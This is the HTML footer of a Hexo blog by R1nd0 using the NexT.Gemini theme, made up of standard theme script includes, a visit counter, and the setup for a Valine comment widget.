    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">R1nd0</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>


<div>
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<span id="busuanzi_container_site_pv" style='display:none'>

</span>
<span id="busuanzi_container_site_uv" style='display:none'>
    
</span>
</div>



        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  










  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick';
    guest = guest.split(',').filter(item=>{
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: false,
        notify: false,
        appId: 'cUx9Jm1BUQRHvy2LK94QgOie-gzGzoHsz',
        appKey: 'Buo6IJhypdvkmiqPjFrOqezT',
        placeholder: '请输入你的留言',
        avatar:'mm',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  





  

  

  

  
  

  

  

  

</body>
</html>
